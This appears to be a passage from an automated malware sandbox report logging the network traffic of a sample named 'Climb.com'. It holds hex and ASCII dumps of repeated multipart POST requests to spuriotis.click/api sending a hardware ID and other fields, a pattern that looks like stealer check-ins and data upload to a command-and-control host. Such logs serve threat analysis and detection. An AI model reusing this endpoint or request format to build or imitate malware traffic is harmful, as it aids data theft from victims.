                                                                                                                                                                        2024-12-28 08:34:55 UTC1369INData Raw: 33 78 71 72 32 7a 73 47 59 51 74 5a 31 63 79 71 6d 33 31 6d 4d 72 61 52 73 65 56 77 65 37 4c 79 66 44 73 6b 6c 4f 74 4f 49 55 6d 61 58 57 77 51 2b 77 5a 7a 44 6f 67 54 33 61 6f 62 4c 50 4d 67 4e 4a 54 7a 5a 62 62 70 34 4b 48 2b 50 66 41 43 75 41 53 68 7a 70 30 5a 37 70 75 35 78 6d 4b 4a 47 74 63 4f 71 68 6c 2b 4a 76 4d 6d 77 2b 4a 6e 4e 48 75 33 63 6e 5a 2f 38 45 63 37 68 65 65 4b 32 41 6a 6f 69 7a 34 56 6f 73 70 4c 67 35 32 72 47 76 34 6b 4d 44 58 51 63 32 57 79 62 79 4b 6a 76 44 39 32 52 6e 6e 48 70 49 32 63 32 69 79 5a 50 4d 61 67 6a 64 72 52 43 54 76 4c 72 4f 54 32 4a 73 5a 69 61 33 4f 76 70 57 4b 74 63 58 45 43 50 73 53 6d 44 45 37 66 50 4e 37 6f 52 47 41 5a 54 59 57 4d 4b 42 70 38 4a 76 42 30 6b 33 45 6e 73 43 72 68 49 2f 7a 2f 74 67 4c 36 78 2b 55
                                                                                                                                                                        Data Ascii: 3xqr2zsGYQtZ1cyqm31mMraRseVwe7LyfDsklOtOIUmaXWwQ+wZzDogT3aobLPMgNJTzZbbp4KH+PfACuAShzp0Z7pu5xmKJGtcOqhl+JvMmw+JnNHu3cnZ/8Ec7heeK2Ajoiz4VospLg52rGv4kMDXQc2WybyKjvD92RnnHpI2c2iyZPMagjdrRCTvLrOT2JsZia3OvpWKtcXECPsSmDE7fPN7oRGAZTYWMKBp8JvB0k3EnsCrhI/z/tgL6x+U
                                                                                                                                                                        2024-12-28 08:34:55 UTC1369INData Raw: 31 6c 37 56 62 55 5a 57 31 52 4e 61 35 71 2b 70 6a 50 33 45 58 62 6b 63 36 38 68 49 6a 38 2b 64 34 4c 34 42 53 66 50 48 4a 75 73 57 2f 6d 45 59 4d 67 4c 68 68 32 71 48 69 7a 7a 49 44 36 54 4d 4b 58 6b 76 54 46 6c 72 6e 74 6b 67 7a 68 57 63 31 39 65 32 6d 34 61 4f 77 56 67 79 5a 38 56 7a 43 39 59 50 36 65 30 74 46 4b 7a 4a 62 45 6f 34 61 50 38 66 2f 65 47 65 51 5a 6c 6a 59 37 4c 66 31 6c 2b 56 62 55 5a 55 31 42 49 4b 56 6e 2f 34 4c 4c 32 6b 4c 66 6c 74 6e 75 79 38 6e 6d 38 38 4e 4c 74 51 2b 46 4b 6e 78 38 38 33 75 68 45 59 42 6c 4e 68 59 77 70 6d 62 30 6b 73 37 4a 52 4d 2b 55 78 71 65 4d 6a 66 2f 33 30 67 2f 70 48 70 41 2b 64 32 69 36 59 65 34 53 68 53 74 6e 57 58 62 68 49 50 53 4d 67 49 4d 42 36 49 44 4b 6f 6f 6a 4a 36 4c 72 4c 53 2b 6f 56 31 57 55 37 62
                                                                                                                                                                        Data Ascii: 1l7VbUZW1RNa5q+pjP3EXbkc68hIj8+d4L4BSfPHJusW/mEYMgLhh2qHizzID6TMKXkvTFlrntkgzhWc19e2m4aOwVgyZ8VzC9YP6e0tFKzJbEo4aP8f/eGeQZljY7Lf1l+VbUZU1BIKVn/4LL2kLfltnuy8nm88NLtQ+FKnx883uhEYBlNhYwpmb0ks7JRM+UxqeMjf/30g/pHpA+d2i6Ye4ShStnWXbhIPSMgIMB6IDKoojJ6LrLS+oV1WU7b
                                                                                                                                                                        2024-12-28 08:34:55 UTC1369INData Raw: 64 6d 69 42 70 51 48 53 61 59 2f 32 61 78 38 30 42 31 71 53 48 37 6f 71 54 74 36 7a 72 45 71 30 65 6d 58 30 6a 49 36 68 6c 34 52 47 57 4d 32 6c 61 4a 36 52 74 2f 37 62 50 33 46 66 4b 6c 4d 71 2f 6a 4d 58 38 2b 5a 4a 46 72 52 36 4e 66 53 4d 6a 6b 6d 58 33 46 61 4d 6d 66 31 39 32 34 53 44 30 67 6f 43 44 41 66 66 62 32 36 32 56 69 76 6a 6c 37 45 75 31 41 4b 74 39 63 48 57 36 63 75 49 41 68 79 68 69 52 77 6a 76 4f 4b 66 47 6b 6f 6b 54 6d 34 53 4a 73 62 72 48 74 2f 57 53 55 39 51 41 31 53 73 37 4f 2b 38 73 6f 51 54 4d 66 53 34 52 4e 62 31 79 39 5a 66 57 32 41 62 33 70 65 36 34 6a 34 37 6e 38 38 55 45 72 56 66 56 4d 6a 73 37 68 43 4c 6f 45 5a 63 30 65 46 73 6d 71 43 44 4d 32 6f 44 44 41 5a 48 62 2f 4b 32 4c 68 2f 44 69 77 30 62 4b 44 35 38 36 61 32 53 71 62 61
                                                                                                                                                                        Data Ascii: dmiBpQHSaY/2ax80B1qSH7oqTt6zrEq0emX0jI6hl4RGWM2laJ6Rt/7bP3FfKlMq/jMX8+ZJFrR6NfSMjkmX3FaMmf1924SD0goCDAffb262Vivjl7Eu1AKt9cHW6cuIAhyhiRwjvOKfGkokTm4SJsbrHt/WSU9QA1Ss7O+8soQTMfS4RNb1y9ZfW2Ab3pe64j47n88UErVfVMjs7hCLoEZc0eFsmqCDM2oDDAZHb/K2Lh/Diw0bKD586a2Sqba
                                                                                                                                                                        2024-12-28 08:34:55 UTC1369INData Raw: 5a 56 59 78 76 33 62 6f 32 4d 6a 59 57 39 4f 6c 39 34 57 4a 6a 2f 44 75 31 51 33 4c 4f 64 56 7a 4f 32 7a 39 4f 74 68 57 78 47 56 52 47 48 61 33 49 4b 76 55 39 64 68 50 78 35 7a 66 76 38 69 68 31 4d 37 6f 53 63 45 65 67 48 39 50 5a 4b 31 7a 36 68 75 41 5a 53 41 57 4d 4f 38 34 6f 39 71 41 33 31 43 4a 77 35 6e 38 33 74 79 6b 6f 34 4a 5a 38 6c 65 4d 66 57 30 6a 35 54 43 76 56 70 35 6c 4e 68 5a 78 72 48 4c 68 6b 73 50 4e 51 6f 36 6c 39 34 6d 4c 6a 76 62 69 77 68 7a 69 4a 36 73 6f 65 47 32 7a 5a 66 63 48 7a 47 73 75 57 58 62 33 57 62 50 63 67 4f 51 50 69 59 4f 4a 39 73 57 38 39 50 72 63 44 50 73 49 32 42 70 31 5a 4c 78 30 38 51 47 44 5a 53 41 57 4d 4f 38 34 6f 64 71 41 33 31 43 4a 77 35 6e 38 33 74 79 6b 6f 34 4a 5a 38 6c 65 4d 66 57 30 6a 35 54 43 76 56 70 35
                                                                                                                                                                        Data Ascii: ZVYxv3bo2MjYW9Ol94WJj/Du1Q3LOdVzO2z9OthWxGVRGHa3IKvU9dhPx5zfv8ih1M7oScEegH9PZK1z6huAZSAWMO84o9qA31CJw5n83tyko4JZ8leMfW0j5TCvVp5lNhZxrHLhksPNQo6l94mLjvbiwhziJ6soeG2zZfcHzGsuWXb3WbPcgOQPiYOJ9sW89PrcDPsI2Bp1ZLx08QGDZSAWMO84odqA31CJw5n83tyko4JZ8leMfW0j5TCvVp5
                                                                                                                                                                        2024-12-28 08:34:55 UTC1369INData Raw: 62 6c 6a 73 39 71 41 31 77 47 52 32 38 69 6b 6c 59 54 34 38 35 34 4d 39 78 37 56 63 7a 74 74 2f 54 71 68 46 34 59 31 59 31 6b 78 34 32 62 39 6d 6f 44 45 44 39 44 62 33 2b 37 64 32 72 6d 30 77 45 75 31 57 64 49 2b 61 58 47 37 59 66 63 56 79 78 74 51 65 79 53 6f 63 50 44 57 38 64 5a 46 33 34 37 4b 76 6f 4b 33 79 64 6e 41 44 50 30 61 31 77 78 74 59 4c 31 73 35 6c 62 43 5a 58 59 57 62 75 39 4e 34 5a 50 51 32 41 47 48 32 38 58 75 33 63 6e 36 35 74 55 62 37 6c 57 53 4a 33 77 6a 6f 69 7a 34 56 70 70 6c 4e 67 56 34 37 33 4b 7a 7a 49 43 63 54 38 53 61 79 71 43 47 6d 2b 58 79 30 52 33 75 58 71 73 44 56 6e 47 36 63 75 4a 55 76 53 68 71 51 43 4f 73 63 50 53 71 2f 76 5a 54 7a 6f 76 4b 37 4b 6d 4f 2b 76 6a 73 4e 64 6f 49 6b 69 30 35 52 62 35 30 34 6c 62 43 5a 58 59 57
                                                                                                                                                                        Data Ascii: bljs9qA1wGR28iklYT4854M9x7Vcztt/TqhF4Y1Y1kx42b9moDED9Db3+7d2rm0wEu1WdI+aXG7YfcVyxtQeySocPDW8dZF347KvoK3ydnADP0a1wxtYL1s5lbCZXYWbu9N4ZPQ2AGH28Xu3cn65tUb7lWSJ3wjoiz4VpplNgV473KzzICcT8SayqCGm+Xy0R3uXqsDVnG6cuJUvShqQCOscPSq/vZTzovK7KmO+vjsNdoIki05Rb504lbCZXYW


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.749766172.67.128.1844437780C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:34:57 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=PUFJDD4WX8DV89CDT6
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 12842
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:34:57 UTC12842OUTData Raw: 2d 2d 50 55 46 4a 44 44 34 57 58 38 44 56 38 39 43 44 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 50 55 46 4a 44 44 34 57 58 38 44 56 38 39 43 44 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 55 46 4a 44 44 34 57 58 38 44 56 38 39 43 44 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a
                                                                                                                                                                        Data Ascii: --PUFJDD4WX8DV89CDT6Content-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--PUFJDD4WX8DV89CDT6Content-Disposition: form-data; name="pid"2--PUFJDD4WX8DV89CDT6Content-Disposition: form-data; name="lid"5FwhVM--lll
                                                                                                                                                                        2024-12-28 08:34:58 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:34:58 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=quopo478l5nhm4u43qpek911sv; expires=Wed, 23 Apr 2025 02:21:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O3domo3dmXlM3u1wjYro%2B%2Fz7OeBMYyvH%2FOozEsEUDXX8ENdBEn4V5vLR%2BaIsfRPbBSSz%2BsccAGGSTC%2B7jJcwymslai6KBgAOVWjAFWTlSWx3nQHHHOiR75qdhawgpP1zDV8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9036d6b8734390-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=2050&rtt_var=795&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=13781&delivery_rate=1354359&cwnd=243&unsent_bytes=0&cid=cd8c8ab4458c37ae&ts=930&x=0"
                                                                                                                                                                        2024-12-28 08:34:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-28 08:34:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.749772172.67.128.1844437780C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:34:59 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=F4ETTRT10471M
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 15044
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:34:59 UTC15044OUTData Raw: 2d 2d 46 34 45 54 54 52 54 31 30 34 37 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 46 34 45 54 54 52 54 31 30 34 37 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 34 45 54 54 52 54 31 30 34 37 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 46 34 45 54 54 52 54 31 30 34 37 31 4d
                                                                                                                                                                        Data Ascii: --F4ETTRT10471MContent-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--F4ETTRT10471MContent-Disposition: form-data; name="pid"2--F4ETTRT10471MContent-Disposition: form-data; name="lid"5FwhVM--lll--F4ETTRT10471M
                                                                                                                                                                        2024-12-28 08:35:00 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:35:00 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=8vu882s01c09a6ar1l2fr366om; expires=Wed, 23 Apr 2025 02:21:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RnWcO7j1J9Loj6rgWmuXpBS%2BZ0AX0dE5b7NmzzII7YdwMXuZW1OV2yq5jYW6x3cgwmi5teVs2aNZmDIWKZNPBf8Zxu5WMQtf2fahME47z562FkVSHkl2J1KPYgoRgaf9X%2Bg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9036e4e9834316-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1540&rtt_var=596&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15978&delivery_rate=1808049&cwnd=177&unsent_bytes=0&cid=dafc94366b15b4dd&ts=815&x=0"
                                                                                                                                                                        2024-12-28 08:35:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-28 08:35:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.749778172.67.128.1844437780C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:35:02 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=G7DEZVA16LULIC39DT
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 20399
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:35:02 UTC15331OUTData Raw: 2d 2d 47 37 44 45 5a 56 41 31 36 4c 55 4c 49 43 33 39 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 47 37 44 45 5a 56 41 31 36 4c 55 4c 49 43 33 39 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 37 44 45 5a 56 41 31 36 4c 55 4c 49 43 33 39 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a
                                                                                                                                                                        Data Ascii: --G7DEZVA16LULIC39DTContent-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--G7DEZVA16LULIC39DTContent-Disposition: form-data; name="pid"3--G7DEZVA16LULIC39DTContent-Disposition: form-data; name="lid"5FwhVM--lll
                                                                                                                                                                        2024-12-28 08:35:02 UTC5068OUTData Raw: 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78
                                                                                                                                                                        Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x
                                                                                                                                                                        2024-12-28 08:35:03 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:35:02 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=8pt9bmvbthv1ncsj176inc6t11; expires=Wed, 23 Apr 2025 02:21:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JqYZ2H0L0PeQXWzD9mEpV4UxoeZM08CH7m3JhKCLTH0L1t8ged3ffKMeQAFTO%2BVUEanKpyegeLBst%2FUueEW1hOattJbccq%2B6j2uOT7zAhuRJjAVFJ3ScZFtISf3kyasA4dA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9036f31cbf728c-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1814&rtt_var=684&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21360&delivery_rate=1594756&cwnd=166&unsent_bytes=0&cid=02201d441ab9ee08&ts=976&x=0"
                                                                                                                                                                        2024-12-28 08:35:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-28 08:35:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.749784172.67.128.1844437780C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:35:04 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=X9PI53GFX9
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 1177
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:35:04 UTC1177OUTData Raw: 2d 2d 58 39 50 49 35 33 47 46 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 58 39 50 49 35 33 47 46 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 39 50 49 35 33 47 46 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 58 39 50 49 35 33 47 46 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                        Data Ascii: --X9PI53GFX9Content-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--X9PI53GFX9Content-Disposition: form-data; name="pid"1--X9PI53GFX9Content-Disposition: form-data; name="lid"5FwhVM--lll--X9PI53GFX9Content-Di
                                                                                                                                                                        2024-12-28 08:35:05 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:35:05 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=md9um1n329usv61fj1vjhpq9tg; expires=Wed, 23 Apr 2025 02:21:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P8GkBBB1R5QCaSKSDfdC%2BKxo80Kd9sclSD0i54dK%2BiSj7oMrNAwPOraVAB0%2BQr46VeCXcVtn0xot7FL6DmC9lf6iLlOywLq7u18r9IcTYnSbZ6cEuum%2F5Bq4zwpcuKrTCC8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f903701efe3c47c-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1468&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2085&delivery_rate=1903520&cwnd=210&unsent_bytes=0&cid=1a816cb478490890&ts=780&x=0"
                                                                                                                                                                        2024-12-28 08:35:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-28 08:35:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.749790172.67.128.1844437780C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:35:06 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=EH2DXUTUL
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 552292
                                                                                                                                                                        Host: spuriotis.click
